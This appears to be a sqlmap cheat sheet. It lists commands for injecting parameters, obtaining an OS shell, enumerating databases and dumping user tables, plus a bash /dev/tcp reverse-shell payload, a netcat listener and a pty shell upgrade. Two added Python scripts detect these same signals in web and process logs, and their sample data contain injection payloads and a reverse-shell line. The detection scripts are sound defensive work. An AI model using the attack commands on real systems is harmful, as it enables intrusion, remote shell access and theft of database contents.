Guide to sqlmap tool – sql injection

Install sqlmap using apt

sudo apt install sqlmap

Example commands

# Test the "search" parameter for SQL injection
sqlmap -u 'http://10.44.13.44/dashboard.php?search=any+query' --cookie="PHPSESSID=rcegk9j75j30330937a1srgll1"

# Try to obtain an OS shell through the injection (--os-shell)
sqlmap -u 'http://10.44.13.44/dashboard.php?search=any+query' --cookie="PHPSESSID=rcegk9j75j30330937a1srgll1" --os-shell

# Get a list of databases (POST login form)
sqlmap -u "https://example.com/login.php" --method POST --data "username=FUZZ&password=FUZZ" --batch --dbs

# Get a list of tables for the given database
sqlmap -u "https://example.com/login.php" --method POST --data "username=FUZZ&password=FUZZ" --tables -D DATABASENAME

# Dump the contents of the users table
sqlmap -u "https://example.com/login.php" --method POST --data "username=FUZZ&password=FUZZ" -D DATABASENAME --batch --dump -T users --force-pivoting

# Take the saved HTTP request from file "req" and automatically dump all data
sqlmap -r req --batch --dump

# Dump all data while sending the user's auth cookie
sqlmap -u http://example.com/hackme.php --cookie="id=1*" --batch --dump

# Basic DB data enumeration
sqlmap -u "http://www.example.com/?id=2" --banner --current-user --current-db --is-dba

# Retrieve table names
sqlmap -u "http://www.example.com/?id=2" --tables -D exampleDB

# Dump table content
sqlmap -u "http://www.example.com/?id=2" --dump -T users -D exampleDB

# For large tables, specify the columns and a row range
sqlmap -u "http://www.example.com/?id=2" --dump -T users -D exampleDB -C name,surname --start=2 --stop=3

# Conditional enumeration (WHERE clause)
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D exampleDB --where="name LIKE 'f%'"
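Every command in the table above leaves a characteristic trace in the web server's access log: sqlmap announces itself with its default User-Agent unless told otherwise, and the requests it sends carry boolean, time-based and UNION payloads in the tested parameter. The following Python script is an added example, not part of the original article or of sqlmap itself; it parses constructed Apache combined-format log lines (the IPs, timestamps and the sqlmap version string are made up), flags each request that matches a rule, and counts flagged requests per source IP to separate an automated scan from a one-off probe.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" format (not real traffic).
# The sqlmap User-Agent follows the tool's default "sqlmap/<version>#<tag> (<site>)" shape.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dashboard.php?search=laptop HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /dashboard.php?search=any%20query HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /dashboard.php?search=any%20query%27%20AND%201%3D1--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /dashboard.php?search=any%20query%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /dashboard.php?search=1%27%20UNION%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /dashboard.php?search=o%27neil HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is applied to the URL-decoded query string of the request.
PAYLOAD_RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("boolean-tautology", re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("time-delay", re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I)),
    # A quote followed later by a SQL comment marker; a lone apostrophe (o'neil) does not fire.
    ("quote-then-comment", re.compile(r"['\"].*?(?:--|#)")),
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decoded_query(target):
    """URL-decode the query string part of the request target ("" if there is none)."""
    return unquote_plus(target.partition("?")[2])


def classify(entry):
    """Return the list of rule names that fire for one parsed log entry."""
    hits = []
    if entry["ua"].lower().startswith("sqlmap"):
        hits.append("sqlmap-user-agent")
    query = decoded_query(entry["target"])
    for name, rx in PAYLOAD_RULES:
        if rx.search(query):
            hits.append(name)
    return hits


def scan_log(text):
    """Scan a whole log; return one finding per line that triggers at least one rule."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append({"ip": entry["ip"], "time": entry["time"],
                             "query": decoded_query(entry["target"]), "rules": hits})
    return findings


def suspicious_sources(findings, threshold=2):
    """Count flagged requests per source IP and return those at or above the threshold."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["rules"], repr(f["query"]))
    print("likely automated scan sources:", suspicious_sources(found))
```

The User-Agent rule is the cheapest signal but also the weakest, since sqlmap can be run with a custom or random agent; the payload rules and the per-IP count still fire in that case, which is why the script keeps all three.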

Notes

Skip the retrieval of content from system databases when dumping everything:

--dump-all --exclude-sysdbs

To make the shell connection much more stable, you can use the following payload:

bash -c "bash -i >& /dev/tcp/{your remote IP address}/1234 0>&1"

Open a listener on port 1234 on your remote machine using netcat:

sudo nc -lvnp 1234

After you get a foothold, make your shell fully interactive:

python3 -c 'import pty; pty.spawn("/bin/bash")'
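The --os-shell step and the two payloads above all rely on the web application's account executing OS commands, so on the host the sequence looks like: the web server user spawns a shell, a shell connects out through /dev/tcp, and a Python process upgrades the session with pty.spawn. The following Python script is an added example, not part of the original article; it reads constructed process-execution records in a simple "timestamp user parent command-line" format (the format, users and the 203.0.113.10 address are made up for the example) and raises one alert per record that matches any of those three host-side signals, extracting the remote endpoint where a /dev/tcp redirection is present.

```python
import re

# Constructed process-execution records (not real telemetry). Format, one per line:
#   <timestamp> <user> <parent-process> <command line>
SAMPLE_EXECS = """\
2024-01-01T10:05:00Z www-data apache2 sh -c id
2024-01-01T10:05:02Z www-data apache2 bash -c bash -i >& /dev/tcp/203.0.113.10/1234 0>&1
2024-01-01T10:05:09Z www-data bash python3 -c import pty; pty.spawn("/bin/bash")
2024-01-01T10:06:00Z alice bash bash -c ls -la /tmp
2024-01-01T10:06:10Z root cron /bin/sh -c /usr/bin/logrotate /etc/logrotate.conf
"""

# Accounts that web servers typically run as; a shell under one of these means the
# web application executed an OS command (assumed list, adjust for your platform).
WEB_USERS = {"www-data", "apache", "nginx", "http"}
SHELLS = {"sh", "bash", "dash"}
DEV_TCP_RE = re.compile(r"/dev/tcp/(?P<host>[^/\s]+)/(?P<port>\d+)")
PTY_RE = re.compile(r"pty\.spawn\s*\(")


def parse_record(line):
    """Split one record into its four fields; return None for malformed lines."""
    parts = line.split(None, 3)
    if len(parts) < 4:
        return None
    ts, user, parent, cmdline = parts
    return {"ts": ts, "user": user, "parent": parent, "cmdline": cmdline}


def analyze(rec):
    """Apply the three rules to one record and return the rules that fired."""
    rules = []
    remote = None
    # Program name without its directory, e.g. "/bin/sh" -> "sh".
    program = rec["cmdline"].split(None, 1)[0].rsplit("/", 1)[-1]
    if rec["user"] in WEB_USERS and program in SHELLS:
        rules.append("web-user-shell")
    m = DEV_TCP_RE.search(rec["cmdline"])
    if m:
        rules.append("dev-tcp-reverse-shell")
        remote = (m.group("host"), int(m.group("port")))
    if PTY_RE.search(rec["cmdline"]):
        rules.append("pty-upgrade")
    return {"ts": rec["ts"], "user": rec["user"], "parent": rec["parent"],
            "rules": rules, "remote": remote}


def scan_execs(text):
    """Return one alert per record that matches at least one rule."""
    alerts = []
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        result = analyze(rec)
        if result["rules"]:
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for a in scan_execs(SAMPLE_EXECS):
        print(a["ts"], a["user"], a["parent"], a["rules"], a["remote"])
```

In production the records would come from auditd, an EDR or a process-accounting source rather than a string, but the rules themselves are the same: a web server account running a shell is already worth an alert before any outbound connection is made, and the extracted remote host and port give the responder the listener side of the session directly.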
